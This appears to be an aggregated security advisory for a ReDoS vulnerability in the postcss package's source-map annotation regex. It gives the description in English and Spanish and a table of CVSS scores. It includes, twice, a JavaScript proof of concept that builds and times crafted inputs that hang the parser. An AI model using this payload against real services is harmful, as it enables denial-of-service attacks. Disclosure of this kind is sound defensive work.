The package postcss before 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and…
snyk·CWE-1333·Published 2021-04-26
The package postcss before 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*).
The package postcss before 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern \/\*\s* sourceMappingURL=(.*).
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern ```regex \/\*\s* sourceMappingURL=(.*) ``` ### PoC ```js var postcss = require("postcss") function build_attack(n) { var ret = "a{}" for (var i = 0; i < n; i++) { ret += "/*# sourceMappingURL=" } return ret + "!"; } ``` ```js postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) try { postcss.parse(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } catch (e) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } } } ```
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern ```regex \/\*\s* sourceMappingURL=(.*) ``` ### PoC ```js var postcss = require("postcss") function build_attack(n) { var ret = "a{}" for (var i = 0; i < n; i++) { ret += "/*# sourceMappingURL=" } return ret + "!"; } ``` ```js postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) { if (i % 1000 == 0) { var time = Date.now(); var attack_str = build_attack(i) try { postcss.parse(attack_str) var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } catch (e) { var time_cost = Date.now() - time; console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms"); } } } ```
El paquete postcss versiones anteriores a 8.2.13, es vulnerable a una Denegación de Servicio de Expresión Regular (ReDoS) por medio de las funciones getAnnotationURL() y loadAnnotation() en la biblioteca lib/previous-map.js. Las expresiones regulares vulnerables son causadas principalmente por el subpatrón \/\*\s* sourceMappingURL=(.*)
| Version | Type | Source | Base | Exp | Impact | Vector |
|---|---|---|---|---|---|---|
| 2.0 | Primary | NVD | 5.0 | 10.0 | 2.9 | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| 3.1 | Primary | NVD | 7.5 | 3.9 | 3.6 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| 3.1 | Primary | cve.org | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
| 3.1 | Primary | cve.org | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
| 3.1 | Secondary | GHSA | 5.3 | — | — | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |
| 3.1 | Secondary | NVD | 5.3 | 3.9 | 1.4 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L |